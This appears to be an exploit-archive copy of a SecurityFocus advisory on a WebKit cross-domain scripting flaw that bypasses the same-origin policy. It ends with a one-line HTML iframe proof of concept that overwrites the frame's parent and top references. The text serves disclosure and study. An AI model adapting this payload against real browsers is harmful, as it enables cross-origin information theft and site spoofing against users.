7 lines
No EOL
460 B
HTML
7 lines
No EOL
460 B
HTML
source: http://www.securityfocus.com/bid/35441/info
|
|
|
|
WebKit is prone to a cross-domain scripting vulnerability.
|
|
|
|
A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or launch spoofing attacks against other sites. Other attacks are also possible.
|
|
|
|
<iframe src="http://www.example.com/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe> |